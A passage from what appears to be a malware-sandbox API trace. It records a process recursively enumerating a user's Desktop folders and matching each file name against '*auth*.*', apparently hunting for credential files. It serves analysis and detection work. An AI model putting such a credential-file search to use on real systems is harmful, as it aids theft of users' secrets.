lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.978] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19d468, cbMultiByte=9, lpWideCharStr=0x3970be0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.978] PathMatchSpecW (pszFile="k8k6qCAjWYmc.odt", pszSpec="*auth*.*") returned 0 [0110.978] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KTOu", cAlternateFileName="")) returned 1 [0110.978] lstrcpyW (in: lpString1=0x19ce30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" [0110.979] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\*.*", lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x743960 [0110.979] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.979] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf35e67a0, ftCreationTime.dwHighDateTime=0x1d7ab76, ftLastAccessTime.dwLowDateTime=0xca5de70, ftLastAccessTime.dwHighDateTime=0x1d7abbb, ftLastWriteTime.dwLowDateTime=0xca5de70, ftLastWriteTime.dwHighDateTime=0x1d7abbb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.979] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.979] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f265de0, ftCreationTime.dwHighDateTime=0x1d7acc3, ftLastAccessTime.dwLowDateTime=0xe01b3e80, ftLastAccessTime.dwHighDateTime=0x1d7af08, ftLastWriteTime.dwLowDateTime=0xe01b3e80, ftLastWriteTime.dwHighDateTime=0x1d7af08, nFileSizeHigh=0x0, nFileSizeLow=0xd048, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CEoMqDCJmINqN85E.bmp", cAlternateFileName="3CEOMQ~1.BMP")) returned 1 [0110.979] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970cc0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.979] PathMatchSpecW (pszFile="3CEoMqDCJmINqN85E.bmp", pszSpec="*auth*.*") returned 0 [0110.979] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1872110, ftCreationTime.dwHighDateTime=0x1d7a92f, ftLastAccessTime.dwLowDateTime=0xbc62b500, ftLastAccessTime.dwHighDateTime=0x1d7ace6, ftLastWriteTime.dwLowDateTime=0xbc62b500, ftLastWriteTime.dwHighDateTime=0x1d7ace6, nFileSizeHigh=0x0, nFileSizeLow=0x3ae1, dwReserved0=0x0, dwReserved1=0x0, cFileName="eUCY-_yVF.swf", cAlternateFileName="EUCY-_~1.SWF")) returned 1 [0110.979] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970b60, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.979] PathMatchSpecW (pszFile="eUCY-_yVF.swf", pszSpec="*auth*.*") returned 0 [0110.979] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58f2e50, ftCreationTime.dwHighDateTime=0x1d7b054, ftLastAccessTime.dwLowDateTime=0xe568fc80, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0xe568fc80, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0xb99e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HLPCM ND3Cl3FgAs3.mp4", cAlternateFileName="HLPCMN~1.MP4")) returned 1 [0110.979] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970ee0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.980] PathMatchSpecW (pszFile="HLPCM ND3Cl3FgAs3.mp4", pszSpec="*auth*.*") returned 0 [0110.980] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b9803e0, ftCreationTime.dwHighDateTime=0x1d7a67d, ftLastAccessTime.dwLowDateTime=0xc285fda0, ftLastAccessTime.dwHighDateTime=0x1d7ada1, ftLastWriteTime.dwLowDateTime=0xc285fda0, ftLastWriteTime.dwHighDateTime=0x1d7ada1, nFileSizeHigh=0x0, nFileSizeLow=0x910b, dwReserved0=0x0, dwReserved1=0x0, cFileName="LQQ8KQ8OZpD-.wav", cAlternateFileName="LQQ8KQ~1.WAV")) returned 1 [0110.980] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970e40, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.980] PathMatchSpecW (pszFile="LQQ8KQ8OZpD-.wav", pszSpec="*auth*.*") returned 0 [0110.980] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UQEQQujqhNYM", cAlternateFileName="UQEQQU~1")) returned 1 [0110.980] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.980] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7434e0 [0110.980] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.980] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a5349d0, ftCreationTime.dwHighDateTime=0x1d7a0e8, ftLastAccessTime.dwLowDateTime=0x3bacdd80, ftLastAccessTime.dwHighDateTime=0x1d7a8c4, ftLastWriteTime.dwLowDateTime=0x3bacdd80, ftLastWriteTime.dwHighDateTime=0x1d7a8c4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.980] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.980] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd13220d0, ftCreationTime.dwHighDateTime=0x1d79ffb, ftLastAccessTime.dwLowDateTime=0xb8ee8eb0, ftLastAccessTime.dwHighDateTime=0x1d7a126, ftLastWriteTime.dwLowDateTime=0xb8ee8eb0, ftLastWriteTime.dwHighDateTime=0x1d7a126, nFileSizeHigh=0x0, nFileSizeLow=0x16d3e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LlE7.doc", cAlternateFileName="")) returned 1 [0110.980] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970de0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.981] PathMatchSpecW (pszFile="LlE7.doc", pszSpec="*auth*.*") returned 0 [0110.981] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4773fc0, ftCreationTime.dwHighDateTime=0x1d7ab51, ftLastAccessTime.dwLowDateTime=0xfbe70ad0, ftLastAccessTime.dwHighDateTime=0x1d7ab5d, ftLastWriteTime.dwLowDateTime=0xfbe70ad0, ftLastWriteTime.dwHighDateTime=0x1d7ab5d, nFileSizeHigh=0x0, nFileSizeLow=0x1566b, dwReserved0=0x0, dwReserved1=0x0, cFileName="s ICeshe.bmp", cAlternateFileName="SICESH~1.BMP")) returned 1 [0110.981] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970f00, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.981] PathMatchSpecW (pszFile="s ICeshe.bmp", pszSpec="*auth*.*") returned 0 [0110.981] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 1 [0110.981] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\UQEQQujqhNYM" [0110.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970c80, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.981] PathMatchSpecW (pszFile="sQpxS.csv", pszSpec="*auth*.*") returned 0 [0110.981] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e12230, ftCreationTime.dwHighDateTime=0x1d7a1fc, ftLastAccessTime.dwLowDateTime=0xb869d1d0, ftLastAccessTime.dwHighDateTime=0x1d7a71a, ftLastWriteTime.dwLowDateTime=0xb869d1d0, ftLastWriteTime.dwHighDateTime=0x1d7a71a, nFileSizeHigh=0x0, nFileSizeLow=0x122d9, dwReserved0=0x0, dwReserved1=0x0, cFileName="sQpxS.csv", cAlternateFileName="")) returned 0 [0110.981] FindClose (in: hFindFile=0x7434e0 | out: hFindFile=0x7434e0) returned 1 [0110.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19cae8, cbMultiByte=9, lpWideCharStr=0x3970c60, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.982] PathMatchSpecW (pszFile="UQEQQujqhNYM", pszSpec="*auth*.*") returned 0 [0110.982] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 1 [0110.982] lstrcpyW (in: lpString1=0x19c4b0, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu" [0110.982] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM\\*.*", lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7434e0 [0110.982] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.982] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0110.982] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.982] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67bd380, ftCreationTime.dwHighDateTime=0x1d7ab0a, ftLastAccessTime.dwLowDateTime=0x1a731140, ftLastAccessTime.dwHighDateTime=0x1d7ad95, ftLastWriteTime.dwLowDateTime=0x1a731140, ftLastWriteTime.dwHighDateTime=0x1d7ad95, nFileSizeHigh=0x0, nFileSizeLow=0xa5ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="aQrMbJ6CFhwhf7PNnuMu.docx", cAlternateFileName="AQRMBJ~1.DOC")) returned 1 [0110.982] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970ca0, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.982] PathMatchSpecW (pszFile="aQrMbJ6CFhwhf7PNnuMu.docx", pszSpec="*auth*.*") returned 0 [0110.982] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2615710, ftCreationTime.dwHighDateTime=0x1d7aff0, ftLastAccessTime.dwLowDateTime=0xec0a4a10, ftLastAccessTime.dwHighDateTime=0x1d7aff3, ftLastWriteTime.dwLowDateTime=0xec0a4a10, ftLastWriteTime.dwHighDateTime=0x1d7aff3, nFileSizeHigh=0x0, nFileSizeLow=0x155c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="ge40CUtwTNBApkxPnR.png", cAlternateFileName="GE40CU~1.PNG")) returned 1 [0110.982] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970c00, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.983] PathMatchSpecW (pszFile="ge40CUtwTNBApkxPnR.png", pszSpec="*auth*.*") returned 0 [0110.983] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68b17880, ftCreationTime.dwHighDateTime=0x1d7ad02, ftLastAccessTime.dwLowDateTime=0xd0a9b460, ftLastAccessTime.dwHighDateTime=0x1d7ae48, ftLastWriteTime.dwLowDateTime=0xd0a9b460, ftLastWriteTime.dwHighDateTime=0x1d7ae48, nFileSizeHigh=0x0, nFileSizeLow=0x8a52, dwReserved0=0x0, dwReserved1=0x0, cFileName="QXzQAUh0jIi.bmp", cAlternateFileName="QXZQAU~1.BMP")) returned 1 [0110.983] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x3970d00, cchWideChar=9 | out: lpWideCharStr="*auth*.*") returned 9 [0110.983] PathMatchSpecW (pszFile="QXzQAUh0jIi.bmp", pszSpec="*auth*.*") returned 0 [0110.983] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 1 [0110.983] lstrcpyW (in: lpString1=0x19bb30, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\\\KTOu\\_5VgSE0-6jvrM" [0110.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x19c168, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0110.983] PathMatchSpecW (pszFile="YzBjdPQG.jpg", pszSpec="*auth*.*") returned 0 [0110.983] FindNextFileW (in: hFindFile=0x7434e0, lpFindFileData=0x19b8e0 | out: lpFindFileData=0x19b8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb0dfa80, ftCreationTime.dwHighDateTime=0x1d7aeba, ftLastAccessTime.dwLowDateTime=0x36bafe00, ftLastAccessTime.dwHighDateTime=0x1d7b022, ftLastWriteTime.dwLowDateTime=0x36bafe00, ftLastWriteTime.dwHighDateTime=0x1d7b022, nFileSizeHigh=0x0, nFileSizeLow=0x5c34, dwReserved0=0x0, dwReserved1=0x0, cFileName="YzBjdPQG.jpg", cAlternateFileName="")) returned 0 [0110.983] FindClose (in: hFindFile=0x7434e0 | out: hFindFile=0x7434e0) returned 1 [0110.983] PathMatchSpecW (pszFile="_5VgSE0-6jvrM", pszSpec="*auth*.*") returned 0 [0110.983] FindNextFileW (in: hFindFile=0x743960, lpFindFileData=0x19c260 | out: lpFindFileData=0x19c260*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xad60b60, ftCreationTime.dwHighDateTime=0x1d7a242, ftLastAccessTime.dwLowDateTime=0x7e00e530, ftLastAccessTime.dwHighDateTime=0x1d7a4b6, ftLastWriteTime.dwLowDateTime=0x7e00e530, ftLastWriteTime.dwHighDateTime=0x1d7a4b6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_5VgSE0-6jvrM", cAlternateFileName="_5VGSE~1")) returned 0 [0110.983] FindClose (in: hFindFile=0x743960 | out: hFindFile=0x743960) returned 1 [0110.983] PathMatchSpecW (pszFile="KTOu", pszSpec="*auth*.*") returned 0 [0110.984] FindNextFileW (in: hFindFile=0x743420, lpFindFileData=0x19cbe0 | out: lpFindFileData=0x19cbe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59203b50, ftCreationTime.dwHighDateTime=0x1d7aa27, 